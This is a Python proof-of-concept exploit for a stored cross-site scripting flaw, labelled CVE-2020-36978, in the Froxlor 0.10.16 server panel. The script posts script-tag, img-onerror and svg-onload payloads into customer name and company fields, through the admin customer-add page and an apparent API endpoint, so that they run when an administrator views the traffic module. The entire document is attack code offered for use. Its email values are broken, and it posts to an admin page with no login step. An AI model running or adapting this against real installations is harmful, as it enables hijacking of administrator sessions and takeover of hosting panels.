# CVE-2020-36978 Stored XSS PoC
# Target: Froxlor Server Management Panel 0.10.16
# Attack Vector: Customer Registration Input Fields
import requests
import json
target_url = "http://target-server/froxlor/"
# Malicious XSS payload for username, name, and firstname fields
xss_payload = "<script>alert(document.cookie)</script>"
# Customer registration endpoint
registration_url = target_url + "admin.php?tab=customers&action=add"
# Registration data with XSS payloads
registration_data = {
"loginname": "attacker_account",
"password": "Password123!",
"password_repeat": "Password123!",
"email": "
[email protected]",
"firstname": xss_payload,
"name": xss_payload,
"company": xss_payload,
"submit": "create"
}
print("[*] Sending malicious registration request...")
response = requests.post(registration_url, data=registration_data)
if response.status_code == 200:
print("[+] XSS payload injected successfully!")
print("[*] Payload will execute when admin views customer traffic module")
print("[*] Payload: " + xss_payload)
else:
print("[-] Registration failed. Status code:", response.status_code)
# Alternative: Direct API registration if available
api_url = target_url + "api/v1/customers"
api_headers = {
"Content-Type": "application/json",
"X-Api-Key": "your-api-key"
}
api_data = {
"loginname": "attacker2",
"email": "
[email protected]",
"firstname": "<img src=x onerror=alert(document.domain)>",
"name": "<svg onload=alert(1)>",
"password": "TestPass123!"
}
print("[*] Trying alternative API registration...")
api_response = requests.post(api_url, headers=api_headers, json=api_data)
print("[*] API Response:", api_response.text)